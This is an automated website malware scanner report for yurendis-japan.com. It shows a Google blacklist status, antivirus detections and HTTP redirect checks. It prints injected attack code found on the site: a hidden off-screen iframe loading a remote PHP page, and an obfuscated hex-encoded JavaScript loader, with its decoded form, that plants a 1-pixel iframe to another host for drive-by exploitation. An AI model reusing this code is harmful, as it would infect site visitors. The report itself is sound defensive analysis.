Malware Scanner report for yurendis-japan.com

Malicious/Suspicious/Total URLs checked: 1/1/3
2 pages have malicious or suspicious code. See details below.

Blacklists: Found
The website is marked by Google as suspicious.

The website "yurendis-japan.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/1
Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=yurendis-japan.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request | Server response | Status
http://yurendis-japan.com/
200 OK
Content-Length: 2732
Content-Type: text/html
suspicious
Suspicious code found

<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="nair" name="nair" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://www.sweetvine.org/7NWpK63z.php" > </iframe>

http://yurendis-japan.com/AC_RunActiveContent.js
200 OK
Content-Length: 11513
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e888782872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b18
... 2173 bytes are skipped ...
38283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var zyty = document.createElement('iframe');

zyty.src = 'http://www.woodshedembroidery.com/admin/HfXv7DZy.php';
zyty.style.position = 'absolute';
zyty.style.border = '0';
zyty.style.height = '1px';
zyty.style.width = '1px';
zyty.style.left = '1px';
zyty.style.top = '1px';

if (!document.getElementById('zyty')) {
document.write('<div id=\'zyty\'></div>');
docume
... 2119 bytes are skipped ...
!start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

Antivirus reports:

AntiVir: JS/iFrame.kpp
Avast: JS:Iframe-CSU [Trj]
Ad-Aware: JS:Exploit.BlackHole.PI
Ikarus: Virus.HTML.Framer
Rising: JS:Script.JS.Quidvetis.a!1612922
nProtect: JS:Exploit.BlackHole.PI
K7AntiVirus: Riskware ( 885143830 )
TrendMicro-HouseCall: TROJ_GEN.F47V1123
Emsisoft: JS:Exploit.BlackHole.PI (B)
Comodo: UnclassifiedMalware
McAfee-GW-Edition: JS/Iframe.gen.u
DrWeb: JS.IFrame.500
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:JS/Quidvetis.A
MicroWorld-eScan: JS:Exploit.BlackHole.PI
Fortinet: JS/Blacole.EU!tr.dldr
McAfee: JS/Iframe.gen.u
NANO-Antivirus: Trojan.Script.Iframe.bopaxv
F-Secure: JS:Exploit.BlackHole.PI
F-Prot: JS/IFrame.RS.gen
AVG: HTML/Framer
Norman: Blacole.XE
Commtouch: JS/IFrame.RS.gen
BitDefender: JS:Exploit.BlackHole.PI

http://yurendis-japan.com/test404page.js
404 Not Found
Content-Length: 910
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: yurendis-japan.com

Result:
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 07:07:11 GMT
Accept-Ranges: bytes
ETag: "99e27a3ec0d0ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 2732
Content-Type: text/html
Last-Modified: Thu, 24 Oct 2013 13:52:14 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...2732 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: yurendis-japan.com
Referer: http://www.google.com/search?q=yurendis-japan.com

Result:
The result is similar to the first query. There are no suspicious redirects found.